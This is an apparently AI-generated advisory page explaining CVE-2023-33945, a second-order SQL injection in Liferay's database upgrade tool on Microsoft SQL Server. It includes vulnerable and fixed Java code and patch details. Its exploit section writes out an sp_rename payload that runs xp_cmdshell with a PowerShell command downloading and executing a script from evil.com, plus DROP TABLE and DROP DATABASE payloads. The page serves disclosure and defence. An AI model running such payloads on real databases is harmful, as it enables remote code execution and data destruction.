CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



CVE-2023-33945

The Time-Bomb in the Schema: Liferay DXP Upgrade SQL Injection

Alon Barad
Alon Barad
Software Engineer

Feb 21, 2026·6 min read·30 visits

Executive Summary (TL;DR)

Liferay's upgrade tool blindly trusts database index names. If an attacker renames an index to include SQL commands, the upgrade process executes them with high privileges. It's a logic bomb waiting for patch day.

A high-complexity, second-order SQL injection vulnerability residing within the Liferay Portal/DXP database upgrade process for Microsoft SQL Server. Unlike typical web-based SQLi, this flaw weaponizes the database metadata itself. An attacker with the ability to modify schema identifiers (specifically primary key index names) can plant a payload that executes arbitrary SQL commands when an administrator initiates a system upgrade. This essentially turns the maintenance process into a trigger for Remote Code Execution (RCE).

The Hook: Sabotaging the Blueprints

In the world of web exploitation, we usually look for the front door: a search bar, a login form, or a REST API endpoint that doesn't sanitize input. We throw quotes at it until it breaks. But CVE-2023-33945 is a different breed of beast. It's a sleeper agent. It’s a landmine planted in the very foundation of the building, waiting for the architect to come by for renovations.

This vulnerability targets the Upgrade Process of Liferay DXP and Portal. Think about what happens during an upgrade. The software needs to migrate data, change column types, and drop old constraints. To do this, it has to query the database to understand the current structure. It asks, "Hey, what are the primary keys on this table?"

The vulnerability arises because the developers made a fatal assumption: they assumed the database schema was a "trusted source." They assumed that an index name like PK_Users would always be a safe string. They didn't anticipate that an attacker might have renamed that index to something like PK_Users']; EXEC xp_cmdshell 'calc'; --. When the upgrade tool reads that metadata and tries to drop the index, it unwittingly executes the payload.

The Flaw: Trusting Metadata

The root cause here is a failure to sanitize metadata retrieved from the database before using it in Dynamic SQL. This is a classic Second-Order SQL Injection, specifically targeting the Data Definition Language (DDL) operations.

Here is the logic flow that creates the vulnerability:

  1. Discovery: The Liferay upgrade tool connects to the MSSQL database.
  2. Introspection: It utilizes JDBC or raw SQL queries to fetch a list of existing constraints and indexes. For example, it might call DatabaseMetaData.getPrimaryKeys().
  3. Construction: The application iterates through these results. It sees a Primary Key that needs to be dropped or altered to match the new version's schema.
  4. Execution: It concatenates the retrieved name directly into a DROP CONSTRAINT statement.

The flaw is specific to Microsoft SQL Server (MSSQL) in this context, likely due to how Liferay constructs T-SQL statements for that specific dialect. While other databases might throw syntax errors if you put weird characters in an identifier, MSSQL is happy to oblige if you break out of the identifier context correctly.

The Code: Autopsy of a SQL Injection

Let's look at a reconstruction of the vulnerable logic. This isn't the exact proprietary code, but it represents the pattern used in the affected BaseDB or upgrade classes handling MSSQL interactions.

The Vulnerable Pattern

// 1. Fetch metadata from the DB
ResultSet rs = databaseMetaData.getPrimaryKeys(null, schema, tableName);
while (rs.next()) {
    String pkName = rs.getString("PK_NAME");
    
    // 2. The fatal flaw: String concatenation without escaping
    // The developer assumes pkName is safe because it came from the DB.
    String sql = "ALTER TABLE " + tableName + " DROP CONSTRAINT " + pkName;
    
    // 3. Execute with high privileges
    statement.execute(sql);
}

If pkName contains PK_1]; DROP TABLE Users; --, the resulting SQL becomes:

ALTER TABLE MyTable DROP CONSTRAINT PK_1]; DROP TABLE Users; --

MSSQL sees the semicolon, terminates the ALTER statement (after failing or succeeding depending on syntax nuances), and then cheerfully executes the DROP TABLE command.

The Fix

To fix this, the input must be treated as a literal identifier. In MSSQL, this usually means wrapping the identifier in brackets [] and escaping any closing brackets inside the name.

// Sanitized/Escaped Version
String escapedPkName = pkName.replace("]", "]]"); // Escape existing brackets
String sql = "ALTER TABLE " + tableName + " DROP CONSTRAINT [" + escapedPkName + "]";

By enclosing the name in brackets, the database engine treats the entire string as the identifier, rendering the payload inert.

The Exploit: The Long Con

Exploiting this requires patience and a specific precondition: Schema Modification Access. You generally can't just throw this payload at a login form. You need a way to create or rename an index in the database.

The Attack Chain

Step 1: Initial Access. The attacker needs a foothold. This could be a lower-severity SQL injection elsewhere in the application that allows ALTER TABLE commands, or compromised credentials for a user with ALTER permissions. Let's assume we found a minor SQLi in a reporting module.

Step 2: Planting the Seed. The attacker uses their access to rename a valid Primary Key on a table known to be touched during upgrades (e.g., User_).

-- The payload is injected into the index name itself
EXEC sp_rename 'PK_User_', 'PK_User_']; EXEC xp_cmdshell ''powershell -c IEX(New-Object Net.WebClient).DownloadString("http://evil.com/shell.ps1")''; --';

Step 3: The Waiting Game. The system continues to function normally. The index name is weird, but MSSQL doesn't care. The Liferay application doesn't care... yet.

Step 4: The Trigger. The Liferay administrator decides it's time to patch the server or upgrade from 7.3 to 7.4. They shut down the web server and run the upgrade tool. The tool connects as the database owner (often sa or db_owner for upgrades).

Step 5: Detonation. The upgrade tool scans the User_ table, sees the malicious PK name, tries to drop it to apply a new schema, and accidentally executes the PowerShell command. The attacker now has a shell running with the privileges of the database service (often SYSTEM or Network Service).

The Impact: Why Panic?

You might argue, "If I already have ALTER permissions, don't I already own the database?" Not necessarily.

  1. Privilege Escalation: You might have access to a scoped user who can modify tables but cannot execute xp_cmdshell or access the underlying OS. The upgrade process, however, typically runs with superuser privileges to handle heavy schema changes. By planting this mine, you escalate from "DB User" to "System Administrator" when the upgrade runs.

  2. Persistence: This is an excellent persistence mechanism. Even if the blue team clears the web shells, if they don't audit the database schema names, the next maintenance window re-infects the server.

  3. Data Destruction: A malicious actor could simply set the payload to DROP DATABASE Lportal, wiping the entire system during what was supposed to be a routine update.

Official Patches

LiferayOfficial Security Advisory

Technical Appendix

CVSS Score
6.4/ 10
CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:H
EPSS Probability
0.35%
Top 43% most exploited

Affected Systems

Liferay Portal 7.3.1 through 7.4.3.17Liferay DXP 7.3 before Update 6Liferay DXP 7.4 before Update 18Microsoft SQL Server (Database Backend)

Affected Versions Detail

Product
Affected Versions
Fixed Version
Liferay Portal
Liferay
7.3.1 - 7.4.3.177.4.3.18
Liferay DXP
Liferay
7.3 < Update 6Update 6
Liferay DXP
Liferay
7.4 < Update 18Update 18
AttributeDetail
CWE IDCWE-89 (SQL Injection)
Attack VectorNetwork (Second Order)
CVSS6.4 (Medium)
ImpactFull System Compromise / RCE
ContextDatabase Upgrade Process
DatabaseMicrosoft SQL Server Only

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1505.001SQL Stored Procedures
Persistence
CWE-89
SQL Injection

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Vulnerability Timeline

Vulnerability Published by Liferay
2023-05-24
Assigned CVE-2023-33945
2023-05-24
Record Updated
2024-10-22

References & Sources

  • [1]Liferay Security Advisory LPE-17482
  • [2]NVD CVE-2023-33945

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 3 hours ago•CVE-2026-53359
8.8

CVE-2026-53359: Use-After-Free in Linux Kernel KVM Shadow MMU (Januscape)

Januscape (CVE-2026-53359) is a critical Use-After-Free vulnerability in the x86 Shadow MMU component of the Linux Kernel's KVM subsystem. A logic error in shadow page tracking permits unauthorized page reuse without validating architectural execution roles, leading to dangling pointers in reverse mapping (rmap) tracking entries during guest memory teardown.

Amit Schendel
Amit Schendel
25 views•5 min read
•about 4 hours ago•CVE-2026-48282
10.0

CVE-2026-48282: Unauthenticated Path Traversal and Arbitrary File Write in Adobe ColdFusion Remote Development Services

CVE-2026-48282 is a critical unauthenticated path traversal and arbitrary file write vulnerability in the Remote Development Services (RDS) component of Adobe ColdFusion. The vulnerability allows a remote, unauthenticated attacker to bypass directory boundaries and write arbitrary files, including CFML-based web shells, onto the host server. This flaw is actively exploited in the wild and enables full unauthenticated remote code execution under the privileges of the ColdFusion service account.

Alon Barad
Alon Barad
11 views•6 min read
•about 8 hours ago•GHSA-GQ4G-FPC9-VJFQ
2.3

GHSA-gq4g-fpc9-vjfq: Username Enumeration via Predictable Decoy Credentials in web-auth/webauthn-lib

An information disclosure vulnerability exists in the web-auth/webauthn-lib PHP library when using the default SimpleFakeCredentialGenerator without a configured secret. This allows unauthenticated remote attackers to determine if a username exists on the target application.

Alon Barad
Alon Barad
8 views•5 min read
•about 9 hours ago•GHSA-CWV4-H3J5-W3CF
3.7

GHSA-CWV4-H3J5-W3CF: Stored and Reflected Cross-Site Scripting in rama's Directory Listing Component

A Stored and Reflected Cross-Site Scripting (XSS) vulnerability was identified in the Rust web service library 'rama' prior to version 0.3.0-rc.1. When serving directories using DirectoryServeMode::HtmlFileList, the library improperly escapes directory names, filenames, and request path components before injecting them into dynamically generated HTML files. This allows attackers to execute malicious scripts inside user browser sessions.

Alon Barad
Alon Barad
7 views•7 min read
•about 10 hours ago•GHSA-Q855-8RH5-JFGQ
6.5

GHSA-Q855-8RH5-JFGQ: Missing Authentication and CSRF in ha-mcp bare root settings and policy routes

The ha-mcp add-on for Home Assistant exposes its settings and security policy routes without authentication at the bare root path of TCP port 9583. This exposure allows unauthorized adjacent network clients to reconfigure tools, alter policies, and bypass human-in-the-loop approval gates. The vulnerability has been addressed in development build 7.6.0.dev393 and subsequent releases by restricting access to root-mounted routes exclusively to the Supervisor Ingress IP.

Amit Schendel
Amit Schendel
6 views•8 min read
•about 10 hours ago•GHSA-F66Q-9RF6-8795
5.3

GHSA-f66q-9rf6-8795: WebAuthn Re-authentication Freshness Bypass in Flask-Security-Too

An authentication freshness bypass vulnerability exists in the WebAuthn re-authentication path of Flask-Security-Too versions 5.8.0 and 5.8.1. The flaw allows an authenticated attacker to elevate the freshness status of a victim session using their own WebAuthn credential, bypassing re-authentication constraints.

Amit Schendel
Amit Schendel
8 views•5 min read